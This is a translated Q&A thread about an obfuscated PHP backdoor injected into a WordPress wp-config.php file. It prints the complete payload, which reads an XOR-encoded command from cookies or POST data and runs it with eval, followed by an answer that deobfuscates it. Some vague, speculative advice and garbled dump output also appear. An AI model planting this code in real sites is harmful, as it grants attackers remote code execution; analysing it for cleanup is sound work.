我朋友的wordpress wp-config.php添加了一行代码:
$ge142efa['cfea']="\x6d\x57\x36\x5f\x6b\x64\x2f\x49\x42\x7e\x4b\x45\x72\x6c\x28\x2e\x7a\x3a\x2a\x39\x37\x61\x67\x22\x73\x31\x38\x9\x48\x23\x70\x34\x7c\x30\x26\x43\x2b\x27\x78\x3d\x75\x68\x5a\x54\x4c\x51\x79\xd\x5b\x4e\x33\x50\xa\x44\x55\x32\x4a\x20\x3c\x25\x65\x69\x46\x60\x59\x4f\x21\x56\x71\x74\x53\x24\x5e\x40\x47\x2c\x6e\x5d\x5c\x3b\x4d\x58\x76\x3f\x35\x29\x7b\x7d\x52\x63\x6f\x77\x66\x6a\x62\x3e\x41\x2d";$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][94]]=$ge142efa['cfea'][89].$ge142efa['cfea'][41].$ge142efa['cfea'][12];$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]=$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][5];$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]=$ge142efa['cfea'][24].$ge142efa['cfea'][69].$ge142efa['cfea'][12].$ge142efa['cfea'][13].$ge142efa['cfea'][60].$ge142efa['cfea'][76];$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]=$ge142efa['cfea'][61].$ge142efa['cfea'][76].$ge142efa['cfea'][61].$ge142efa['cfea'][3].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][69];$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]=$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][61].$ge142efa['cfea'][21].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][16].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][16].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][50].$ge142efa['cfea'][89]]=$ge142efa['cfea'][30].$ge142efa['cfea'][41].$ge142efa['cfea'][30].$ge142efa['cfea'][82].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][24].$ge142efa['cfea'][61].$ge142efa['cfea'][90].$ge142efa['cfea'][76];$ge142efa[$ge142efa['cfea'][61].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][26].$ge142efa['cfea'][50].$ge142efa['cfea'][33].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]=$ge142efa['cfea'][40].$ge142efa['cfea'][76].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][61].$ge142efa['cfea'][21].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][16].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][92].$ge142efa['cfea'][26].$ge142efa['cfea'][20].$ge142efa['cfea'][50].$ge142efa['cfea'][2]]=$ge142efa['cfea'][94].$ge142efa['cfea'][21].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][2].$ge142efa['cfea'][31].$ge142efa['cfea'][3].$ge142efa['cfea'][5].$ge142efa['cfea'][60].$ge142efa['cfea'][89].$ge142efa['cfea'][90].$ge142efa['cfea'][5].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][89].$ge142efa['cfea'][33].$ge142efa['cfea'][84]]=$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][69].$ge142efa['cfea'][3].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][60].$ge142efa['cfea'][3].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][61].$ge142efa['cfea'][69];$ge142efa[$ge142efa['cfea'][40].$ge142efa['cfea'][31].$ge142efa['cfea'][19].$ge142efa['cfea'][25]]=$ge142efa['cfea'][61].$ge142efa['cfea'][31].$ge142efa['cfea'][2].$ge142efa['cfea'][25];$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]=$ge142efa['cfea'][22].$ge142efa['cfea'][55].$ge142efa['cfea'][94].$ge142efa['cfea'][89];$ge142efa[$ge142efa['cfea'][12].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][94].$ge142efa['cfea'][92]]=$_POST;$ge142efa[$ge142efa['cfea'][93].$ge142efa['cfea'][19].$ge142efa['cfea'][20].$ge142efa['cfea'][84]]=$_COOKIE;@$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][12].$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][3].$ge142efa['cfea'][13].$ge142efa['cfea'][90].$ge142efa['cfea'][22],NULL);@$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][13].$ge142efa['cfea'][90].$ge142efa['cfea'][22].$ge142efa['cfea'][3].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][12].$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][24],0);@$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][0].$ge142efa['cfea'][21].$ge142efa['cfea'][38].$ge142efa['cfea'][3].$ge142efa['cfea'][60].$ge142efa['cfea'][38].$ge142efa['cfea'][60].$ge142efa['cfea'][89].$ge142efa['cfea'][40].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][90].$ge142efa['cfea'][76].$ge142efa['cfea'][3].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][60],0);@$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][89].$ge142efa['cfea'][33].$ge142efa['cfea'][84]](0);$tf027f=NULL;$w38258dd=NULL;$ge142efa[$ge142efa['cfea'][0].$ge142efa['cfea'][33].$ge142efa['cfea'][33].$ge142efa['cfea'][25].$ge142efa['cfea'][89].$ge142efa['cfea'][26].$ge142efa['cfea'][31].$ge142efa['cfea'][20].$ge142efa['cfea'][84]]=$ge142efa['cfea'][33].$ge142efa['cfea'][31].$ge142efa['cfea'][20].$ge142efa['cfea'][92].$ge142efa['cfea'][94].$ge142efa['cfea'][84].$ge142efa['cfea'][31].$ge142efa['cfea'][94].$ge142efa['cfea'][97].$ge142efa['cfea'][26].$ge142efa['cfea'][19].$ge142efa['cfea'][89].$ge142efa['cfea'][20].$ge142efa['cfea'][97].$ge142efa['cfea'][31].$ge142efa['cfea'][33].$ge142efa['cfea'][94].$ge142efa['cfea'][31].$ge142efa['cfea'][97].$ge142efa['cfea'][26].$ge142efa['cfea'][26].$ge142efa['cfea'][25].$ge142efa['cfea'][55].$ge142efa['cfea'][97].$ge142efa['cfea'][84].$ge142efa['cfea'][20].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][26].$ge142efa['cfea'][94].$ge142efa['cfea'][55].$ge142efa['cfea'][2].$ge142efa['cfea'][25].$ge142efa['cfea'][5].$ge142efa['cfea'][33].$ge142efa['cfea'][20];global$m001c8475;function g2bc($tf027f,$p7ec){global$ge142efa;$de211af="";for($z225cd560=0;$z225cd560<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($tf027f);){for($a7a4f09df=0;$a7a4f09df<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($p7ec)&&$z225cd560<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($tf027f);$a7a4f09df++,$z225cd560++){$de211af.=$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][94]]($ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]($tf027f[$z225cd560])^$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]($p7ec[$a7a4f09df]));}}return$de211af;}function i461($tf027f,$p7ec){global$ge142efa;global$m001c8475;return$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]($ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]($tf027f,$m001c8475),$p7ec);}foreach($ge142efa[$ge142efa['cfea'][93].$ge142efa['cfea'][19].$ge142efa['cfea'][20].$ge142efa['cfea'][84]]as$p7ec=>$i61171){$tf027f=$i61171;$w38258dd=$p7ec;}if(!$tf027f){foreach($ge142efa[$ge142efa['cfea'][12].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][94].$ge142efa['cfea'][92]]as$p7ec=>$i61171){$tf027f=$i61171;$w38258dd=$p7ec;}}$tf027f=@$ge142efa[$ge142efa['cfea'][61].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][26].$ge142efa['cfea'][50].$ge142efa['cfea'][33].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]($ge142efa[$ge142efa['cfea'][40].$ge142efa['cfea'][31].$ge142efa['cfea'][19].$ge142efa['cfea'][25]]($ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][92].$ge142efa['cfea'][26].$ge142efa['cfea'][20].$ge142efa['cfea'][50].$ge142efa['cfea'][2]]($tf027f),$w38258dd));if(isset($tf027f[$ge142efa['cfea'][21].$ge142efa['cfea'][4]])&&$m001c8475==$tf027f[$ge142efa['cfea'][21].$ge142efa['cfea'][4]]){if($tf027f[$ge142efa['cfea'][21]]==$ge142efa['cfea'][61]){$z225cd560=Array($ge142efa['cfea'][30].$ge142efa['cfea'][82]=>@$ge142efa[$ge142efa['cfea'][16].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][50].$ge142efa['cfea'][89]](),$ge142efa['cfea'][24].$ge142efa['cfea'][82]=>$ge142efa['cfea'][25].$ge142efa['cfea'][15].$ge142efa['cfea'][33].$ge142efa['cfea'][97].$ge142efa['cfea'][25],);echo@$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]($z225cd560);}elseif($tf027f[$ge142efa['cfea'][21]]==$ge142efa['cfea'][60]){eval($tf027f[$ge142efa['cfea'][5]]);}exit();}
这意味着什么? 我试图将eval改为打印,但没有显示。
答案 0 :(得分:2)
在var_dump的第一个语句之后使用$_COOKIE我可以看到第一个数组的结构似乎包含了几个函数名,这些名称后来被称为:
var_dump($ge142efa);
array(14) {
["cfea"]=>
[N3Pring(98) "mW6_kd/IB~KErl(.z:*97ag"s18 H#p4|0&C+'x=uhZTLQy
DU2J <%eiF`YO!VqtS$^@G,n]\;MXv?5){}Rcowfjb>A-"
["hfa2b"]=>
string(3) "chr"
["he58"]=>
string(3) "ord"
["ge19947"]=>
string(6) "strlen"
["xa2a5ede"]=>
string(7) "ini_set"
["k5051"]=>
string(9) "serialize"
["z2503c"]=>
string(10) "phpversion"
["i50830251"]=>
string(11) "unserialize"
["kf8736"]=>
string(13) "base64_decode"
["vc05"]=>
string(14) "set_time_limit"
["u491"]=>
string(4) "i461"
["v2298682"]=>
string(4) "g2bc"
["re5bf"]=>
string(6) "$_POST"
["j975"]=>
string(8) "$_COOKIE"
}
我已将字符串替换为$_POST和$_COOKIE内容作为占位符,因为我的测试环境在容器内是php -f。
这个数组和第一个函数声明之间的部分归结为:
@ini_set('error_log', NULL); // @$ge142efa['xa2a5ede']('error_log', NULL);
@ini_set('log_errors', 0); // @$ge142efa['xa2a5ede']('log_errors', 0);
@ini_set('max_execution_time', 0); // @$ge142efa['xa2a5ede']('max_execution_time', 0);
@set_time_limit(0); // @$ge142efa['vc05'](0);
$tf027f = NULL;
$w38258dd = NULL;
$ge142efa['m001c8475'] = '047fb54b-89c7-40b4-8812-57fa8b261d07';
第一个函数如下:
function g2bc($tf027f, $p7ec){
global $ge142efa;
$de211af = "";
for($i = 0; $i < "strlen"($tf027f);){
for($j = 0; $j < "strlen"($p7ec) && $i < "strlen"($tf027f); $j++, $i++){
$de211af .= "chr"("ord"($tf027f[$i])^"ord"($p7ec[$j]));
}
}
return $de211af;
}
似乎xor两个字符串并返回结果。
下面的函数i461使用它两次:
function i461($tf027f, $p7ec){
global $ge142efa;
global $m001c8475;
return "g2bc"("g2bc"($tf027f,$m001c8475),$p7ec);
}
这两个函数下面的代码 可以美化到这个:
foreach($_COOKIE as $p7ec => $i61171){
$tf027f = $i61171;
$w38258dd = $p7ec;
}
if(!$tf027f){
foreach($_POST as $p7ec => $i61171){
$tf027f = $i61171;
$w38258dd = $p7ec;
}
}
$tf027f =@ "unserialize"("i461"("base64_decode"($tf027f),$w38258dd));
if(isset($tf027f["ak"]) && $m001c8475 == $tf027f["ak"]){
if($tf027f["a"] == "i"){
$z225cd560 = Array("pv" => @"phpversion"(), "sv" => "1.0-1",);
echo@"serialize"($z225cd560);
}elseif($tf027f["a"] == "e"){
eval($tf027f["d"]);
}
exit();
}
这里的关键部分是eval。从我的角度来看,这看起来像执行由$_COOKIE和/或$_POST的正确组合给出的内容的代码。基本上是一部分代码等待获得正确的请求并执行它指定的代码。
答案 1 :(得分:1)
我正在处理同样的问题。你的朋友必须做出一些改变。可能是IP地址被一些人追踪并且他正在对数据库进行一些更改,这也会影响你的前端和代码。
- If you have backup of database then change the database.
- Install some security Plugin like All In One WP Security & Firewall.
(Because if IP is traced again than it may help in future).
其他一些变化。